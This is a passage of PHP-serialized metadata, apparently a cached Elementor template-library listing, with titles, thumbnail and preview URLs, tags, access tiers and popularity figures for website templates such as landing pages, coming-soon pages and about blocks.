1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_4.png\";s:12:\"tmpl_created\";i:1520443512;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/about-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:42;s:16:\"popularity_index\";i:147;s:11:\"trend_index\";i:9;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:286;a:20:{s:4:\"tmpl\";i:1159;s:2:\"id\";i:17245;s:5:\"title\";s:34:\"Marketing Course &#8211; Education\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2021/01/PPC.png\";s:12:\"tmpl_created\";i:1610902958;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/lp/marketing-course-education/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:9:\"Education\";s:4:\"tags\";s:45:\"[\"Course Online\",\"Landing Pages\",\"Marketing\"]\";s:10:\"menu_order\";i:43;s:16:\"popularity_index\";i:770;s:11:\"trend_index\";i:430;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:287;a:20:{s:4:\"tmpl\";i:1240;s:2:\"id\";i:21430;s:5:\"title\";s:30:\"Travel Blogger &#8211; Gallery\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2021/12/19-Gallery-Travel-Blogger.jpg\";s:12:\"tmpl_created\";i:1638821592;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/travel-blogger-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:43:\"[\"Gallery\",\"Photography\",\"Slider\",\"Travel\"]\";s:10:\"menu_order\";i:43;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:288;a:20:{s:4:\"tmpl\";i:1149;s:2:\"id\";i:16983;s:5:\"title\";s:41:\"Pilates Instructor &#8211; Online Service\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2021/01/Pilates-Instructor.png\";s:12:\"tmpl_created\";i:1610534138;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/lp/pilates-instructor-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:70:\"[\"Free Trial\",\"Instructor\",\"Landing Pages\",\"Online Service\",\"Pilates\"]\";s:10:\"menu_order\";i:44;s:16:\"popularity_index\";i:778;s:11:\"trend_index\";i:412;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:289;a:20:{s:4:\"tmpl\";i:1416;s:2:\"id\";i:24104;s:5:\"title\";s:33:\"Ceramics Shop &#8211; Coming Soon\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Ceramics-Shop.jpg\";s:12:\"tmpl_created\";i:1650988949;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/ceramics-shop-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:115:\"[\"Art\",\"Business\",\"Coming Soon\",\"Creative\",\"Decor\",\"Design\",\"Furniture Design\",\"Interior Design\",\"Products\",\"Shop\"]\";s:10:\"menu_order\";i:44;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:290;a:20:{s:4:\"tmpl\";i:557;s:2:\"id\";i:6135;s:5:\"title\";s:8:\"About 10\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_2.png\";s:12:\"tmpl_created\";i:1520443663;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-10/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:45;s:16:\"popularity_index\";i:77;s:11:\"trend_index\";i:47;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:291;a:20:{s:4:\"tmpl\";i:1412;s:2:\"id\";i:24033;s:5:\"title\";s:37:\"Dance Studio &#8211; Maintenance Mode\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/04/Maintenance-Mode-Dance-Studio.jpg\";s:12:\"tmpl_created\";i:1649881344;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/dance-studio-maintenance-mode/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:113:\"[\"Academy\",\"Business\",\"Dance Studio\",\"Form\",\"Pilates\",\"School\",\"Sport\",\"Teacher\",\"Training\",\"Under Construction\"]\";s:10:\"menu_order\";i:45;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:292;a:20:{s:4:\"tmpl\";i:1190;s:2:\"id\";i:18568;s:5:\"title\";s:32:\"Flower Delivery &#8211; Business\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2021/04/Flower-Delivery.png\";s:12:\"tmpl_created\";i:1617546716;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/flower-delivery-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:37:\"[\"Delivery\",\"Flower\",\"Landing Pages\"]\";s:10:\"menu_order\";i:45;s:16:\"popularity_index\";i:874;s:11:\"trend_index\";i:763;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:293;a:20:{s:4:\"tmpl\";i:1145;s:2:\"id\";i:16917;s:5:\"title\";s:22:\"Webinar &#8211; Events\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2021/01/Webinar-Library-Pic.jpg\";s:12:\"tmpl_created\";i:1610466822;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/lp/webinar-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:36:\"[\"Events\",\"Landing Pages\",\"Webinar\"]\";s:10:\"menu_order\";i:46;s:16:\"popularity_index\";i:821;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:294;a:20:{s:4:\"tmpl\";i:1413;s:2:\"id\";i:24049;s:5:\"title\";s:33:\"ECO Shop &#8211; Maintenance Mode\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/04/Maintenance-Mode-ECO-Shop.jpg\";s:12:\"tmpl_created\";i:1649882053;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/eco-shop-maintenance-mode/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:110:\"[\"Aesthetic\",\"Business\",\"Creative\",\"Decor\",\"Health\",\"Help\",\"Lifestyle\",\"Products\",\"Shop\",\"Under Construction\"]\";s:10:\"menu_order\";i:46;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:295;a:20:{s:4:\"tmpl\";i:497;s:2:\"id\";i:5397;s:5:\"title\";s:8:\"About 11\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_1.png\";s:12:\"tmpl_created\";i:1520443503;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-11/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:46;s:16:\"popularity_index\";i:148;s:11:\"trend_index\";i:43;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:296;a:20:{s:4:\"tmpl\";i:1154;s:2:\"id\";i:17079;s:5:\"title\";s:42:\"Calls Volunteer &#8211; Social Involvement\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2021/01/Calls-Volunteer.png\";s:12:\"tmpl_created\";i:1610631774;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/lp/calls-volunteer-social-involvement/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:18:\"Social Involvement\";s:4:\"tags\";s:68:\"[\"Care\",\"Covid-19\",\"Help\",\"Involvement\",\"Landing Pages\",\"Volunteer\"]\";s:10:\"menu_order\";i:47;s:16:\"popularity_index\";i:854;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:297;a:20:{s:4:\"tmpl\";i:1419;s:2:\"id\";i:24136;s:5:\"title\";s:29:\"Food Blog &#8211; Coming Soon\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Food-Blog.jpg\";s:12:\"tmpl_created\";i:1650990034;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/food-blog-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:62:\"[\"Blog\",\"Business\",\"Coming Soon\",\"Cooking\",\"Education\",\"Food\"]\";s:10:\"menu_order\";i:47;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:298;a:20:{s:4:\"tmpl\";i:1142;s:2:\"id\";i:16836;s:5:\"title\";s:33:\"Marketing Agency &#8211; Business\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2021/01/Marketing-Agency-Library-Pic.jpg\";s:12:\"tmpl_created\";i:1610464490;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/marketing-agency-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:74:\"[\"Agency\",\"Business\",\"Landing Pages\",\"Marketing\",\"Marketing Landing Page\"]\";s:10:\"menu_order\";i:48;s:16:\"popularity_index\";i:816;s:11:\"trend_index\";i:787;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:299;a:20:{s:4:\"tmpl\";i:1411;s:2:\"id\";i:24020;s:5:\"title\";s:35:\"Mobile App &#8211; Maintenance Mode\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/04/Maintenance-Mode-Mobile-App.jpg\";s:12:\"tmpl_created\";i:1649880955;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/mobile-app-maintenance-mode/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:77:\"[\"App\",\"Business\",\"Coding\",\"Computer\",\"Launch\",\"Mobile\",\"Under Construction\"]\";s:10:\"menu_order\";i:48;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:300;a:20:{s:4:\"tmpl\";i:498;s:2:\"id\";i:5405;s:5:\"title\";s:8:\"About 12\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_1.png\";s:12:\"tmpl_created\";i:1520443505;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-12/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:48;s:16:\"popularity_index\";i:216;s:11:\"trend_index\";i:50;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:301;a:20:{s:4:\"tmpl\";i:1139;s:2:\"id\";i:16785;s:5:\"title\";s:42:\"Gym Promotion &#8211; Health &amp; Fitness\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2021/01/Gym-LP.jpg\";s:12:\"tmpl_created\";i:1610455496;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/lp/gym-promotion-health-fitness/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:18:\"Health and Fitness\";s:4:\"tags\";s:42:\"[\"Fitness\",\"Gym\",\"Health\",\"Landing Pages\"]\";s:10:\"menu_order\";i:49;s:16:\"popularity_index\";i:820;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:302;a:20:{s:4:\"tmpl\";i:1420;s:2:\"id\";i:24152;s:5:\"title\";s:32:\"Perfume Shop &#8211; Coming Soon\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Perfume-Shop.jpg\";s:12:\"tmpl_created\";i:1650990353;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/perfume-shop-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:68:\"[\"Business\",\"Coming Soon\",\"Cosmetics\",\"Lifestyle\",\"Products\",\"Shop\"]\";s:10:\"menu_order\";i:49;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:303;a:20:{s:4:\"tmpl\";i:1185;s:2:\"id\";i:18492;s:5:\"title\";s:34:\"Bicycle Pre-Sale &#8211; eCommerce\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Bike-Landing-Page.png\";s:12:\"tmpl_created\";i:1617535552;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/lp/bicycle-pre-sale-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:34:\"[\"Bicycle\",\"Landing Pages\",\"Sale\"]\";s:10:\"menu_order\";i:50;s:16:\"popularity_index\";i:871;s:11:\"trend_index\";i:826;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:304;a:20:{s:4:\"tmpl\";i:1418;s:2:\"id\";i:24126;s:5:\"title\";s:28:\"Skincare &#8211; Coming Soon\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Skincare.jpg\";s:12:\"tmpl_created\";i:1650989585;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/skincare-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:128:\"[\"Aesthetic\",\"Beauty\",\"Beauty Salon\",\"Business\",\"Coming Soon\",\"Cosmetics\",\"Girly\",\"Lifestyle\",\"Services\",\"Skincare\",\"Treatment\"]\";s:10:\"menu_order\";i:51;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:305;a:20:{s:4:\"tmpl\";i:1181;s:2:\"id\";i:18349;s:5:\"title\";s:39:\"Virtual try-on glasses &#8211; Business\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/03/250x280-8.png\";s:12:\"tmpl_created\";i:1614772569;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/lp/virtual-try-on-glasses-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:64:\"[\"Fashion\",\"Glasses\",\"Landing Pages\",\"Online Service\",\"Virtual\"]\";s:10:\"menu_order\";i:51;s:16:\"popularity_index\";i:848;s:11:\"trend_index\";i:803;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:306;a:20:{s:4:\"tmpl\";i:500;s:2:\"id\";i:5421;s:5:\"title\";s:8:\"About 13\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_3.png\";s:12:\"tmpl_created\";i:1520443509;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-13/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:51;s:16:\"popularity_index\";i:215;s:11:\"trend_index\";i:77;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:307;a:20:{s:4:\"tmpl\";i:513;s:2:\"id\";i:5533;s:5:\"title\";s:8:\"About 15\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_10.png\";s:12:\"tmpl_created\";i:1520443534;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-15/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:52;s:16:\"popularity_index\";i:21;s:11:\"trend_index\";i:57;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:308;a:20:{s:4:\"tmpl\";i:1410;s:2:\"id\";i:24004;s:5:\"title\";s:33:\"Skincare &#8211; Maintenance Mode\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/04/Maintenance-Mode-Skincare.jpg\";s:12:\"tmpl_created\";i:1649880534;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/skincare-maintenance-mode/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:144:\"[\"Aesthetic\",\"Beauty\",\"Beauty Salon\",\"Business\",\"Cosmetics\",\"Girly\",\"Lifestyle\",\"Makeup\",\"Services\",\"Skincare\",\"Treatment\",\"Under Construction\"]\";s:10:\"menu_order\";i:52;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:309;a:20:{s:4:\"tmpl\";i:1172;s:2:\"id\";i:17458;s:5:\"title\";s:31:\"Moving Company &#8211; Business\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2021/02/Library-Pic-Moving-Company.png\";s:12:\"tmpl_created\";i:1612727025;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/lp/moving-company-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:46:\"[\"Business\",\"Landing Pages\",\"Movers\",\"Moving\"]\";s:10:\"menu_order\";i:52;s:16:\"popularity_index\";i:826;s:11:\"trend_index\";i:767;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:310;a:20:{s:4:\"tmpl\";i:1415;s:2:\"id\";i:24092;s:5:\"title\";s:29:\"Vase Shop &#8211; Coming Soon\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Vase-Shop.jpg\";s:12:\"tmpl_created\";i:1650988613;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/vase-shop-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:115:\"[\"Art\",\"Business\",\"Coming Soon\",\"Creative\",\"Decor\",\"Design\",\"Furniture Design\",\"Interior Design\",\"Products\",\"Shop\"]\";s:10:\"menu_order\";i:53;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:311;a:20:{s:4:\"tmpl\";i:1186;s:2:\"id\";i:18517;s:5:\"title\";s:29:\"Food Blog &#8211; Coming Soon\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Food-Blog.png\";s:12:\"tmpl_created\";i:1617539897;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/lp/food-blog-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:16:\"Coming Soon Page\";s:4:\"tags\";s:45:\"[\"Blog\",\"Coming Soon\",\"Food\",\"Landing Pages\"]\";s:10:\"menu_order\";i:53;s:16:\"popularity_index\";i:844;s:11:\"trend_index\";i:672;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:312;a:20:{s:4:\"tmpl\";i:1167;s:2:\"id\";i:17379;s:5:\"title\";s:33:\"IT Service &#8211; Online Service\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2021/02/Library-Pic-IT-Service.png\";s:12:\"tmpl_created\";i:1612713022;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/it-service-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:41:\"[\"IT\",\"Landing 